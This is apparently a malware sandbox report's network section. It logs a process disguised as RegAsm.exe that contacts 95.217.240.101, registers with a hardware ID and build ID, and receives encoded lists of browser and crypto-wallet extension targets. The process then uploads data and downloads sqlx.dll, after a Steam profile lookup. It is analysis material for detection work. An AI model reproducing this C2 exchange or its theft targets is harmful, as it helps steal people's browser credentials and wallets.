                                                                                  May 15, 2024 20:36:17.024590015 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.024646044 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.024648905 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.024684906 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.028404951 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.028418064 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.028467894 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.028470993 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.028506041 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.030694962 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.030714989 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.030770063 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.030774117 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.030817986 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.033071995 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.033087969 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.033138990 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.033143044 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.033175945 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.036345005 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.036356926 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.036405087 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.036407948 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.036444902 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.039257050 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.039273024 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.039323092 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.039325953 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.039361954 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.041445971 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.041460037 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.041510105 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.041512966 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.041548014 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.043746948 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043760061 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043807983 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.043811083 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043844938 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046169043 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046201944 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046220064 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046222925 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046243906 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046257019 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046262026 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046302080 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046629906 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046642065 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.122545958 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122581005 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.122648954 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122827053 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122843027 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.594315052 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.597814083 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598490000 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598503113 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.598664045 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598669052 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341727018 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341764927 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341778994 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341841936 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.341871977 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341892004 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311326027 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311373949 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.311466932 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311731100 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311738968 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.777136087 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.777228117 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.777801991 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.777812004 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.778048992 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.778053999 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676810026 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676867008 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676986933 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.676986933 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.677092075 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.677110910 CEST4434976095.217.240.101192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 15, 2024 20:35:50.009427071 CEST | 58223 | 53 | 192.168.2.4 | 1.1.1.1
May 15, 2024 20:35:50.120599031 CEST | 53 | 58223 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 15, 2024 20:35:50.009427071 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd2 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 15, 2024 20:35:50.120599031 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd2 | No error (0) | steamcommunity.com | | 23.194.234.100 | A (IP address) | IN (0x0001) | false

                                                                                  • steamcommunity.com
                                                                                  • 95.217.240.101
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 23.194.234.100 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:50 UTC | 119 | OUT | GET /profiles/76561199686524322 HTTP/1.1
                                                                                  Host: steamcommunity.com
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:51 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Date: Wed, 15 May 2024 18:35:51 GMT
                                                                                  Content-Length: 35643
                                                                                  Connection: close
                                                                                  Set-Cookie: sessionid=5ec96a72569b8cd0a0d36a61; Path=/; Secure; SameSite=None
                                                                                  Set-Cookie: steamCountry=US%7Cbce9df44965cd26b147023c797831e66; Path=/; Secure; HttpOnly; SameSite=None
2024-05-15 18:35:51 UTC | 14502 | IN
                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-15 18:35:51 UTC | 10074 | IN
                                                                                  Data Ascii: a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="
2024-05-15 18:35:51 UTC | 11067 | IN
                                                                                  Data Ascii: EB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&qu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:51 UTC | 233 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
2024-05-15 18:35:52 UTC | 5 | IN
                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:53 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 279
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:53 UTC | 279 | OUT
                                                                                  Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="hwid"BBDD5BBF18E41866486636-a33c7340-61ca-11ee-8c18-806e6f6e6963------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------
2024-05-15 18:35:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
2024-05-15 18:35:53 UTC | 69 | IN
                                                                                  Data Ascii: 3a1|1|1|0|5e2114c344718c2740c7f8c85866bab9|1|1|1|0|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:54 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:54 UTC | 331 | OUT
                                                                                  Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------FHCAEGCBFHJDGCBFHDAFCont
2024-05-15 18:35:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
2024-05-15 18:35:55 UTC | 1564 | IN
                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:55 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:55 UTC | 331 | OUT
                                                                                  Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DBKFHCFBGIIJKFHJDHDHCont
2024-05-15 18:35:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
2024-05-15 18:35:56 UTC | 5605 | IN
                                                                                  Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:57 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 332
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
2024-05-15 18:35:57 UTC | 332 | OUT
                                                                                  Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DBAAFIDGDAAAAAAAAKEBCont
2024-05-15 18:35:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
2024-05-15 18:35:57 UTC | 119 | IN
                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:35:58 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 7081
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:58 UTC7081OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GDAAKFIDGIEGDGDHIDAKCont
                                                                                  2024-05-15 18:35:59 UTC  158  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:59 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  7           192.168.2.4  49737        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:35:59 UTC  241  OUT  GET /sqlx.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:00 UTC  248  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:59 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2459136
                                                                                  Last-Modified: Sun, 12 May 2024 18:14:05 GMT
                                                                                  Connection: close
                                                                                  ETag: "664106ed-258600"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  8           192.168.2.4  49738        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:36:02 UTC  326  OUT  POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 4677
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:02 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDAFIIDAKJDGDHIDAKJJCont
                                                                                  2024-05-15 18:36:03 UTC  158  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:03 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  9           192.168.2.4  49739        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:36:03 UTC  326  OUT  POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 1529
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:03 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GDAAKFIDGIEGDGDHIDAKCont
                                                                                  2024-05-15 18:36:04 UTC  158  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:04 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  10          192.168.2.4  49740        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:36:04 UTC  325  OUT  POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
